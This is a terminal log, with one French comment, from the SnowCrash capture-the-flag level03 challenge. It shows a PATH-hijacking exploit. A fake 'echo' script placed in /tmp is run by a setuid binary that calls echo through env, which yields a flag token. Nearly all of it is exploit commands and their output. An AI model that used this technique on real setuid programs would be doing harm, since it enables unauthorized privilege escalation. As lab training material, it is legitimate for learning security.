level03@SnowCrash:~$ ls -la
total 24
dr-x------ 1 level03 level03  120 Mar  5  2016 .
d--x--x--x 1 root    users    340 Aug 30  2015 ..
-r-x------ 1 level03 level03  220 Apr  3  2012 .bash_logout
-r-x------ 1 level03 level03 3518 Aug 30  2015 .bashrc
-rwsr-sr-x 1 flag03  level03 8627 Mar  5  2016 level03
-r-x------ 1 level03 level03  675 Apr  3  2012 .profile
level03@SnowCrash:~$ ./level03 
Exploit me
level03@SnowCrash:~$ ./level03 test
Exploit me
level03@SnowCrash:~$ strings level03 
/lib/ld-linux.so.2
KT{K
...
/usr/bin/env echo Exploit me
..
level03@SnowCrash:~$ mkdir /tmp/flag
level03@SnowCrash:~$ touch /tmp/flag/echo
level03@SnowCrash:~$ echo "./getflag" > /tmp/flag/echo
level03@SnowCrash:~$ PATH=/tmp/flag
level03@SnowCrash:~$ ./level03 
/tmp/flag/launch.sh: line 1: ./getflag: Permission denied
level03@SnowCrash:~$ PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games
level03@SnowCrash:~$ echo "/bin/bash -c /bin/getflag" > /tmp/flag/echo
# -c permet d'executer la commande en une fois et de profiter du suid
level03@SnowCrash:~$ PATH=/tmp/flag
level03@SnowCrash:~$ ./level03 
Check flag.Here is your token : qi0maab88jeaj46qoumi7maus
